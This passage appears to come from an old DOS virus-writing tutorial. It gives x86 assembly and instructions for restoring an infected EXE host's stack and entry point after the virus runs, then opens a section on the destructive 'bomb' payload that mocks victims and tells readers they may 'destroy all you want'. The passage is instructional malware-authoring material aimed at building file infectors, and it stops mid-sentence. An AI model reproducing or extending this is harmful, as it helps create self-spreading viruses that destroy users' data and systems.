Virus programming

Page 48

        mov     sp, word ptr cs:[bp+StackSave]
        sti
        db      0eah                    ; JMP FAR PTR SEG:OFF
ExeWhereToJump: dd 0
StackSave:      dd 0

ExeWhereToJump2 dd 0
StackSave2      dd 0

Upon infection, the initial CS:IP and SS:SP should be stored in ExeWhereToJump2 and StackSave2, respectively. They should then be moved to ExeWhereToJump and StackSave before restoration of the program. This restoration may be easily accomplished with a series of MOVSW instructions. Some like to clear all the registers prior to the JMP/RET, i.e., they issue a bunch of XOR instructions. If you feel happy and wish to waste code space, you are welcome to do this, but it is unnecessary in most instances.

──────── THE BOMB ────────

"The horror! The horror!"
- Joseph Conrad, The Heart of Darkness

What goes through the mind of a lowly computer user when a virus activates? What terrors does the unsuspecting victim undergo as the computer suddenly plays a Nazi tune? How awful it must be to lose thousands of man-hours of work in an instant!

Actually, I do not support wanton destruction of data and disks by virii. It serves no purpose and usually shows little imagination. For example, the world-famous Michelangelo virus did nothing more than overwrite sectors of the drive with data taken at random from memory. How original. Yawn. Of course, if you are hell-bent on destruction, go ahead and destroy all you want, but just remember that this portion of the virus is usually the only part seen by "end-users" and distinguishes it from others. The best